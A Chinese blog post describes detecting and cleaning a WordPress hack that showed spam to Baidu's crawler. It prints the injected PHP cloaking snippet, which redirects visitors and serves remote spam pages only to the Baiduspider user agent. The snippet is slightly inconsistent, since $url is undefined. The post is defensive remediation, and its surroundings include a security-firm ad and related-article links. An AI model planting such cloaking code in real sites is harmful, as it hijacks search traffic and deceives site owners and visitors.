网站被黑了被挂马篡改后我是如何解决网站被挂马!

简介: 1、发现被黑,网站被黑的症状      两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。

1、发现被黑,网站被黑的症状

      两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源代码也正常,丝毫没有被篡改的痕迹。但是,为什么百度爬虫会抓取到这些广告文字呢,这些文字哪里来的?


2、自己猜想了一下原因,页面和百度抓取收录显示不一致。查服务器日志方案不可行。

     网站实际页面和百度排虫收录显示不一致,网站源代码肯定被了,但怎么改的,改在哪里不知道,服务器里代码文件有几百个,一个个检查,一行行看源代码肯定不现实。首先想到了检查服务器日志。但是问题是不知道骇客哪天改的,所以只能调出了几个星期的服务器日志来检查。可是,检查日志也是庞大的工程,而且对此经验不足,也很费事,也不一定有结果。因此,只能又寻求新的办法。

3、找到了问题解决的关键路线,使用useragent-watch

     页面内容没变,但百度排虫抓取错了,问题肯定出在爬虫抓取身上。所以如果能看到排虫抓取的整个流程,或许会会找到答案。一番研究之后,找到了一个工具“user-agent-switcher”,可以模拟各种设备和搜索引擎排虫,chrome和火狐浏览器都有插件可以安装。chrome安装useragent-watch之后,添加百度爬虫useragent 设置:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)。如图。

其他搜索引擎useragent:http://hi.baidu.com/romicboy/item/afc8d8d217278d5bd63aae22


     设置完以后,切换到模拟百度爬虫状态,再次访问我的网站,这次果然现原形了,网站这次跳到了另一个网站页面,这个页面内容就是,我网站在百度上显示的那些广告信息,如下图。再把useragent切换回来,输入我的网站域名,这次访问一切正常。这次可以下结论了,问题是在useragent上。骇客肯定修改了网站的源代码,而且是在源代码里加了判断语句,如果是当前请求的useragent是搜索引器爬虫,就把排虫引到把广告页面,如果是其他的就正常执行的。

4、找到被修改的源代码

     虽然找到了问题原因,但是该怎么找到被修改的文件呢。不过,了解了wordpress源代码文件执行顺序流程,一切就很简单了,如下图,按照顺序一个个文件找很快就能找到。


登录到ftp,按照文件首先找到了index.php文件,果然,运气不错,第一个文件就是被修改的。骇客在代码最开始就添加了如下图的代码。


如果还是被反复篡改被入侵的话建议找专业做安全的来处理

Sine安全公司是一家专注于:服务器安全、网站安全、网站漏洞检测、网站安全测试、渗透测试服务

一体的网络安全服务提供商。

5、解释下这段php代码的意思:


$file="http://www.XXXX.com/XXXX/X.htm";

$referer=$_SERVER["HTTP_REFERER"];//来路的网址url

$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);//当前请求的内容转化成小写


if(strstr($referer,"baidu")&&strstr($referer,"456"))//如果是从百度点到该页的

{

   Header("Location: $url");//转到原来的正常url

}

if(ereg("http://www.baidu.com/search/spider.htm",$agent))//如果是百度排虫

{



        $content=file_get_contents($file);//转到之前定义的那个url页面

        echo $content;


        exit;


}

 把这一段删了,就ok了。重新提交百度,让百度重新抓取,过了几天百度快照更新就好了。

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
前端开发
给网站“挂”上灯笼
给网站“挂”上灯笼
49 0
|
SQL 存储 监控
卧槽,sql注入竟然把我们的系统搞挂了(下)
卧槽,sql注入竟然把我们的系统搞挂了(下)
|
SQL 安全 关系型数据库
卧槽,sql注入竟然把我们的系统搞挂了(上)
卧槽,sql注入竟然把我们的系统搞挂了(上)
卧槽,sql注入竟然把我们的系统搞挂了(上)
|
安全 JavaScript
怎么防止网站不被挂木马篡改
因为说这些脚本文件它都是一些静态的文件连接,那么既然是静态的,那就是说我们存放这个脚本的这个服务器,它只能放静态文件,不支持任何的脚本语言,那它也就不可能存在任何的后门,也不可能被篡改挂木马,上传脚本后门文件等等这些问题,所以说只要替换成静态的连接文件,那么说你网站从此以后没人能修改这些静态的脚本文件,他如果想给网站挂木马的话,那只有其他的办法,那就是说给你网页插入一个新的脚本文件,那么他给你插一个新的脚本文件的话,我想普通的站长一眼就能看到,所以不需要到处去找,直接就可以把它移除掉,或者是我们可以配合一些网站的检测一些程序,检测你网站是否存在未知的文件,配合这样一些东西去方便快速的锁定,这个
192 0
怎么防止网站不被挂木马篡改
|
安全 SEO
我的网站被挂马了导致排名没了怎么解决
昨天我的网站出现了问题,我有一个医疗设备的网站,然后就是百度搜索,你百度搜索关键词后,然后出来了一个出来我的网站,但是他点击进去以后,他直接跳转到一个游戏界面了,然后我问我的那个技术员,他说网站被木马劫持了,应该是网站,可能是被挂木马了什么的,然后我技术员说了一句话挺搞笑的,他说黑客攻击你的网站,在你网站上挂木马,说明就被挂了后门什么的,说明你的网站有潜力哈哈。当时我就感觉非常搞笑,然后技术员修复了漏洞清理了木马后门,总之让他说的就是这个问题很简单,直接修复就可以了,他说的也有一点道理,反正挺搞笑的这个答案(后来才知道这个技术员也是懂点皮毛,当时他也是找的网站漏洞修复公司给解决的)。
115 0
我的网站被挂马了导致排名没了怎么解决
|
SQL 弹性计算 安全
网站服务器被黑怎么处理
近日,某一客户网站服务器被入侵,导致服务器被植入木马病毒,重做系统也于事无补,目前客户网站处于瘫痪状态,损失较大,通过朋友介绍找到我们SINESAFE,我们立即成立安全应急处理小组,针对客户服务器被攻击,被黑的情况进行全面的安全检测与防护部署。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。
175 0
网站服务器被黑怎么处理
|
安全 Linux Shell
Linux服务器被黑,该怎么处理解决
很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序,以及网站被上传webshell的安全提醒,包括腾讯云提示服务器有木马文件,客户网站被攻击的第一时间,是需要立即处理的,降损失降到最低,让网站恢复正常的访问,由于每个客户找到我们SINE安全都是比较着急的,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器被攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否
323 0
Linux服务器被黑,该怎么处理解决
|
安全 搜索推荐 数据库
网站被黑入侵被挂马后跳转如何解决处理掉跳转代码?
网站被黑入侵被挂马后跳转如何解决处理掉跳转代码?
215 0
网站被黑入侵被挂马后跳转如何解决处理掉跳转代码?
|
安全 算法 数据安全/隐私保护
关于网站被挂马的症状以及处理解决方法
如今绝大多数站长都在想着怎么建设外链,怎么发布网站内容,把自己网站的弄到首页或是前三位,网站安全其实也需要站长们注意,因为一旦网站安全出了问题,网站的排名也会受到很大的影响。下面就仔细分析几种关于网站安全的现象以及处理的方法。
412 0
关于网站被挂马的症状以及处理解决方法
|
安全 搜索推荐 JavaScript
网站被入侵快照被劫持该如何解决
网站安全是重中之重对此我们Sinesafe对于网站被挂马被黑的防范意识,如何判断网站被黑,网站被挂马,网站快照被劫持,网站快照被篡改,导致被百度网址安全中心提醒您:该页面可能存在违法信息。
122 0
网站被入侵快照被劫持该如何解决